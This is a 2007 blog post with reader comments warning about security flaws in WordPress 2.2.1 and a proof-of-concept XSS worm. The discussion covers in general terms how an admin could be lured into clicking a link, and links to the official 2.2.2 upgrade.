Wordpress worm

Might be time to think about upgrading your  wordpress sites as over 7 security flaws have been found in wordpress 2.2.1 enough that some one has actually created the first Wordpress Worm http://paymentblogger.com/2007/08/01/wordpress-blues-solved-with-a-worm/

It uses XSS to "patch" your PHP files to fix the hole but how long before some one else develops a more nefarious one, if your not familiar with the idea of XSS attacks then this article may help http://ventureskills.wordpress.com/2007/05/30/cross-site-scripting-a-pointless-seo-tactic/

I don't get it. Wordpress mentions nothing on this problem at their blog....

BTW do you know if version 2.2 is vulnerable?

http://mybeni.rootzilla.de/mybeNi/2007/wordpress_zeroday_vulnerability_roundhouse_kick_and_why_i_nearly_wrote_the_first_blog_worm/
I believe it effects all versions in particular 2.2.1 which is the latest :)

Nikolas,
I don't think they want to make a big fuss about the vulnerabilities,
since they don't want people to get ideas about attacking other wordpress sites ...

most of the vulnerabilities are only if the attacker has admin rights...

What do you mean. Is it possible to get admin rights for anyone or do they need to have the admin password to use the vulnerabilities or do you mean that admins with too low security on their passwords are easy targets?

I have about 7 blogs I need to upgrade so I guess I better start today :D

/Andreas

the hacker needs admin rights...

not in all cases though ;) however the worm works by getting an admin to click the link and therefore give the admin rights.

Now a malicious worm would say send a trackback to you, you see it in the stats what do you do?
So having a strong password in this scenario won't help

Thanks for the warning. I have upgraded all my blogs now (at least the once using wordpress :D )

/Andreas

http://wordpress.org/development/2007/08/wordpress-222-and-2011/
Official upgrade announced and ready to download :D

do you checked if all problems are fixed with this update?